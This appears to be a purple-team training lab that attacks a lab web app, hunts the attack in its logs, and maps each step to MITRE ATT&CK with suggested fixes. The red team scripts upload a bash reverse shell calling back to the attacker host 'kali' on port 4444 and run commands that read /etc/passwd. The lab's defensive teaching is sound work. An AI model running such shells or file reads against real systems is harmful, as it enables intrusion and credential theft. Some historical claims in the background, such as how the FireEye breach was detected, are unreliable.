Execute a full red team engagement simulation and then switch to blue team — hunting for the traces left behind:
Red Team — exploit a vulnerability chain: web recon → SQLi → shell upload → privesc → persistence
Blue Team — use the attacker's own artefacts to detect, contain, and eradicate the compromise
SIEM log correlation — correlate multiple log sources to build a complete attack picture
Threat hunting hypothesis — develop and test hypotheses against log data
Purple Team debrief — map every attack step to a MITRE ATT&CK technique and corresponding detection
Background
Threat hunting is proactive — you don't wait for an alert. You form a hypothesis ("if an attacker has lateral movement capability, they'll enumerate SMB shares") and go looking for evidence. The best threat hunters are ex-red teamers who know exactly what they'd do if they were attacking.
Real-world examples:
2022 Uber breach — Uber's SIEM had the lateral movement data but no one was actively hunting; the attacker announced himself on Slack before detection. A threat hunting programme would have caught it in hour 1.
2020 FireEye Red Team Tools Theft — FireEye threat hunters noticed an unusual OAuth token request at 12:44 AM that didn't match any known employee pattern. This was the initial detection of the SolarWinds campaign.
APT29 (Cozy Bear) — operates with a TTPs-over-tools philosophy; replaces common tools to evade signature detection. Threat hunting on behaviour (not signatures) is the only reliable detection method.
Purple team exercises — used by Netflix, Microsoft, and major banks; red team attacks a defined scope, blue team defends in real time, both sides debrief with full TTPs mapping afterward.
echo "=== RED TEAM: Phase 3 — Web Shell Upload ==="
python3 << 'EOF'
import urllib.request, json
T = "http://target-adv20:5000"
# Upload reverse shell script
shell = '#!/bin/bash\nbash -i >& /dev/tcp/kali/4444 0>&1'
req = urllib.request.Request(f"{T}/api/upload",
data=json.dumps({"filename":"update.sh","content":shell}).encode(),
headers={"Content-Type":"application/json"})
r = json.loads(urllib.request.urlopen(req).read())
print(f"[!] Shell uploaded to: {r['uploaded']}")
EOF
echo "=== RED TEAM: Phase 4 — Command Execution ==="
python3 << 'EOF'
import urllib.request, urllib.parse, json
T = "http://target-adv20:5000"
for cmd in ["id", "cat /etc/passwd | head -3", "cat /tmp/update.sh"]:
r = json.loads(urllib.request.urlopen(T+"/api/exec?cmd="+urllib.parse.quote(cmd)).read())
print(f"$ {cmd}")
print(f" {r.get('output','')[:100].strip()}")
EOF
echo "=== BLUE TEAM: Phase 1 — Collect and Parse Logs ==="
python3 << 'EOF'
import json, urllib.request
# Pull application logs
logs_raw = urllib.request.urlopen("http://target-adv20:5000/api/logs").read().decode()
logs = [json.loads(line) for line in logs_raw.strip().split('\n') if line]
print("[*] All log entries:")
for entry in logs:
icon = {'INFO':'ℹ️','WARN':'⚠️','ERROR':'❌','CRITICAL':'🚨'}.get(entry['level'],'•')
print(f" {icon} [{entry['ts'][-8:]}] [{entry['level']:<8}] {entry['msg'][:80]}")
print()
print("[*] SIEM Correlation — suspicious events by IP:")
by_ip = {}
for e in logs:
ip = e.get('ip','')
if ip not in by_ip: by_ip[ip] = []
by_ip[ip].append(e)
for ip, events in by_ip.items():
if ip == 'internal': continue
levels = [e['level'] for e in events]
print(f" IP: {ip} events={len(events)} severity_max={'CRITICAL' if 'CRITICAL' in levels else ('WARN' if 'WARN' in levels else 'INFO')}")
for e in events:
if e['level'] in ('WARN','CRITICAL','ERROR'):
print(f" → {e['msg'][:70]}")
EOF
python3 << 'EOF'
import json, urllib.request
logs_raw = urllib.request.urlopen("http://target-adv20:5000/api/logs").read().decode()
logs = [json.loads(line) for line in logs_raw.strip().split('\n') if line]
print("[*] Threat Hunting Hypotheses and Results:")
print()
# Hypothesis 1: SQLi
sqli_logs = [l for l in logs if 'SQLi' in l.get('msg','')]
print(f"H1: Attacker used SQL injection")
print(f" Evidence: {len(sqli_logs)} WARN entries matching SQLi pattern")
if sqli_logs:
print(f" Attacker IP: {sqli_logs[0]['ip']}")
print(f" Payload: {sqli_logs[0]['msg'][:80]}")
print()
# Hypothesis 2: File upload
upload_logs = [l for l in logs if 'uploaded' in l.get('msg','').lower()]
print(f"H2: Attacker uploaded a backdoor file")
print(f" Evidence: {len(upload_logs)} file upload events")
for u in upload_logs:
print(f" File: {u['msg']}")
print()
# Hypothesis 3: Command execution
exec_logs = [l for l in logs if 'Command execution' in l.get('msg','')]
print(f"H3: Attacker achieved remote code execution")
print(f" Evidence: {len(exec_logs)} CRITICAL command execution events")
for e in exec_logs:
print(f" Command: {e['msg'][:80]}")
print()
attacker_ips = set(l['ip'] for l in sqli_logs + upload_logs + exec_logs)
print(f"[!] VERDICT: CONFIRMED COMPROMISE")
print(f" Attacker IPs: {attacker_ips}")
print(f" Attack chain: SQLi → credential dump → file upload → RCE")
print(f" Containment: block {attacker_ips} at perimeter firewall immediately")
EOF
python3 << 'EOF'
print("[*] PURPLE TEAM DEBRIEF — MITRE ATT&CK Mapping")
print()
print(f"{'Red Team Action':<40} {'ATT&CK Technique':<25} {'Detection Method'}")
print("-"*100)
steps = [
("nmap port scan", "T1046 Network Scan", "Firewall/IDS port scan alert"),
("SQLi in ?category= param", "T1190 Exploit Public App","WAF SQLi rule, error log spike"),
("UNION SELECT to dump users", "T1555 Credential Dump", "SQL WARN log, anomaly detection"),
("POST /api/upload shell script", "T1505.003 Web Shell", "File creation alert in /tmp"),
("GET /api/exec?cmd=id", "T1059 Command Execution", "CRITICAL log entry from web app"),
("cat /etc/passwd via exec", "T1003 OS Cred Dump", "Audit log: access to /etc/passwd"),
("Persistence via upload", "T1053 Scheduled Task", "New file in /tmp executed"),
]
for action, technique, detection in steps:
print(f" {action:<40} {technique:<25} {detection}")
print()
print("[*] Detection Coverage:")
detected = len([s for s in steps if s[2] != '(none)'])
print(f" {detected}/{len(steps)} attack steps would generate detectable events")
print(f" {len(steps)-detected}/{len(steps)} steps require additional coverage")
print()
print("[*] Improvements identified:")
improvements = [
"Deploy WAF with SQLi rules on /api/products",
"Restrict /api/upload to authenticated admin users only",
"Remove /api/exec entirely (no legitimate use case)",
"Enable file integrity monitoring on /tmp and /var/www",
"Set up SIEM alert: >3 WARN events from same IP in 60 seconds",
"Enable EDR on web servers to catch shell process spawning",
]
for i, imp in enumerate(improvements, 1):
print(f" {i}. {imp}")
EOF
exit